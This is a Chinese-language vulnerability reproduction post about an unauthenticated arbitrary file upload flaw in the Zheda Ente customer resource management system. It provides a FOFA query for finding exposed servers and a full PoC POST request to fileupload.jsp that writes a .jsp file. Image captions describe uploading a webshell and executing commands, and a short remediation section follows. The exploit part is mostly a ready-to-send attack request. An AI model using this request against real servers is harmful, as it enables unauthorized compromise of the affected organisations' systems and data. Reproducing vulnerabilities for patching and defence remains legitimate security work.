浙大恩特客户资源管理系统任意文件上传漏洞复现

0x01 产品简介

     浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

0x02 漏洞概述

  浙大恩特客户资源管理系统中fileupload.jsp接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。

0x03 复现环境

FOFA:app="浙大恩特客户资源管理系统"

浙大恩特客户资源管理系统任意文件上传漏洞复现_第1张图片

0x04 漏洞复现 

PoC

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=1.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Encoding: gzip, deflate

123

浙大恩特客户资源管理系统任意文件上传漏洞复现_第2张图片

回显了上传路径 

验证

浙大恩特客户资源管理系统任意文件上传漏洞复现_第3张图片

上传马子

浙大恩特客户资源管理系统任意文件上传漏洞复现_第4张图片

命令执行 

浙大恩特客户资源管理系统任意文件上传漏洞复现_第5张图片 0x05 修复建议 

关闭互联网暴露面或设置接口访问权限

 升级至安全版本

 

你可能感兴趣的:(漏洞复现,安全,web安全)